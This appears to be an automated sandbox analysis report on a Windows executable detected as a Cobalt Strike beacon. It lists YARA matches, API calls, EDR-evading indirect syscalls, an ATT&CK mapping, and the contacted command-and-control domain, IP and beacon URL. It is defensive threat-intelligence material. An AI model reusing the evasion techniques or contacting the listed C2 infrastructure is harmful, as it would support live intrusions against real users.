            Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
            Source: 00000000.00000002.3315812932.00000000020A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: Process Memory Space: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe PID: 6516, type: MEMORYSTRMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: classification engineClassification label: mal92.troj.evad.winEXE@1/0@1/1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140054158 GetVersionExW,wcschr,CoInitializeEx,CoCreateInstance,0_2_0000000140054158
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014005876C GetModuleHandleW,GetUserDefaultUILanguage,FindResourceExW,FindResourceW,LoadResource,GlobalAlloc,0_2_000000014005876C
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeReversingLabs: Detection: 25%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic file information: File size 3636736 > 1048576
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x211c00
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: More than 200 imports for USER32.dll
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\Jenkins\workspace\consumer-12-0-1-service\bin\Release\x64\SBAMCommandLineScanner.pdb source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: real checksum: 0x33725e should be: 0x3790fb
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401350C1 push rcx; ret 0_2_00000001401350C2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140104C7C SetForegroundWindow,IsIconic,PostMessageW,IsIconic,0_2_0000000140104C7C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140104C7C SetForegroundWindow,IsIconic,PostMessageW,IsIconic,0_2_0000000140104C7C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140044F34 IsIconic,0_2_0000000140044F34
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014013D3C0 IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,0_2_000000014013D3C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014013D3C0 IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,0_2_000000014013D3C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014013D3C0 IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,0_2_000000014013D3C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400B1740 GetParent,IsIconic,GetParent,GetDlgCtrlID,0_2_00000001400B1740
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140105A3C IsIconic,0_2_0000000140105A3C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140099CE8 SetRectEmpty,RedrawWindow,ReleaseCapture,SetCapture,ReleaseCapture,SetCapture,GetParent,SendMessageW,UpdateWindow,GetParent,SendMessageW,IsWindow,IsIconic,IsZoomed,IsWindow,UpdateWindow,0_2_0000000140099CE8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400C5D9C IsWindowVisible,IsIconic,0_2_00000001400C5D9C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014013DFAC IsWindowVisible,IsWindowVisible,GetWindowRect,IsIconic,CopyRect,MonitorFromPoint,GetMonitorInfoW,CopyRect,CopyRect,SystemParametersInfoW,OffsetRect,GetSystemMetrics,GetSystemMetrics,0_2_000000014013DFAC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014013E2CC IsIconic,PostMessageW,0_2_000000014013E2CC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401CDB40 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00000001401CDB40
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeAPI coverage: 1.5 %
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014003C388 GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,0_2_000000014003C388
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2364213906.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3314909007.0000000000459000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2275023579.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2395775873.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2498019988.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2121493380.00000000004DC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2438416359.00000000004DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_3_01FC4060 LdrLoadDll,0_3_01FC4060
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401D83C4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00000001401D83C4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401CC9B0 GetLastError,IsDebuggerPresent,OutputDebugStringW,0_2_00000001401CC9B0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014000E540 GetProcessHeap,_Init_thread_footer,_Init_thread_footer,0_2_000000014000E540
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401D83C4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00000001401D83C4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeNtResumeThread: Indirect: 0x20A4F90Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeNtSetContextThread: Indirect: 0x20A3ACAJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeNtAllocateVirtualMemory: Indirect: 0x1FC0185Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeNtCreateThreadEx: Indirect: 0x20A6602Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeNtSetContextThread: Indirect: 0x20A6953Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeNtResumeThread: Indirect: 0x20A66EDJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeNtSuspendThread: Indirect: 0x20A4E8CJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeNtSetContextThread: Indirect: 0x20A3D44Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeNtSetContextThread: Indirect: 0x20A66D8Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeNtCreateThreadEx: Indirect: 0x20A686DJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeNtAllocateVirtualMemory: Indirect: 0x1FC0249Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeNtProtectVirtualMemory: Indirect: 0x1FC0887Jump to behavior
            Sets debug register (to hijack the execution of another thread)
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeThread register set: 6516 40Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001402009C0 AllocateAndInitializeSid,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,MakeSelfRelativeSD,GetLastError,LocalAlloc,MakeSelfRelativeSD,LocalFree,LocalFree,FreeSid,0_2_00000001402009C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001402009C0 AllocateAndInitializeSid,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,MakeSelfRelativeSD,GetLastError,LocalAlloc,MakeSelfRelativeSD,LocalFree,LocalFree,FreeSid,0_2_00000001402009C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: try_get_function,GetLocaleInfoW,0_2_00000001401EFFE4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401F0068 try_get_function,GetSystemTimeAsFileTime,0_2_00000001401F0068
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140054158 GetVersionExW,wcschr,CoInitializeEx,CoCreateInstance,0_2_0000000140054158
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Remote Access Functionality

            barindex
            Yara detected CobaltStrike
            Source: Yara matchFile source: 0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe PID: 6516, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		1
            Process Injection            		1
            Disable or Modify Tools            		21
            Input Capture            		1
            System Time Discovery            		Remote Services21
            Input Capture            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		1
            Process Injection            		LSASS Memory1
            Query Registry            		Remote Desktop Protocol1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		Security Account Manager31
            Security Software Discovery            		SMB/Windows Admin Shares1
            Clipboard Data            		2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Abuse Elevation Control Mechanism            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture113
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Obfuscated Files or Information            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials14
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe25%ReversingLabsWin64.Backdoor.CobaltStrikeBeacon

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            easthoolbook.com
            		89.150.57.46
            		truetrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://easthoolbook.com/sign.mpeg?dare=truefalse
                		unknown
                easthoolbook.comtrue
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://easthoolbook.com/TjSecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2931428688.000000000051B000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    https://easthoolbook.com/sign.mpeg?dare=trueProviderLjSecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2901567104.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2931428688.000000000051B000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://easthoolbook.com/sign.mpeg?dare=true$jSecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2498019988.000000000051C000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://easthoolbook.com/bqSecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2781427971.000000000313D000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://easthoolbook.com/sign.mpeg?dare=trueGsSecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3129143309.000000000313D000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://easthoolbook.com/GsSecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3099234815.000000000313D000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://easthoolbook.com/sign.mpeg?dare=trueProviderSecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2275023579.000000000051C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2468168029.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2181259233.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2334675503.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2245388886.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2212647131.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2364213906.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2498019988.000000000051C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2438416359.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2395775873.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.000000000051B000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://easthoolbook.com/ign.mpeg?dare=trueSecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3261508325.000000000313D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://easthoolbook.com/sign.mpeg?dare=true%YESecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2275023579.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2334675503.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2931428688.00000000004E7000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2275111012.00000000004E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://easthoolbook.com/nrSecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2841533366.000000000313D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://easthoolbook.com/sign.mpeg?dare=truebd8SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2151387101.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2181259233.000000000051B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
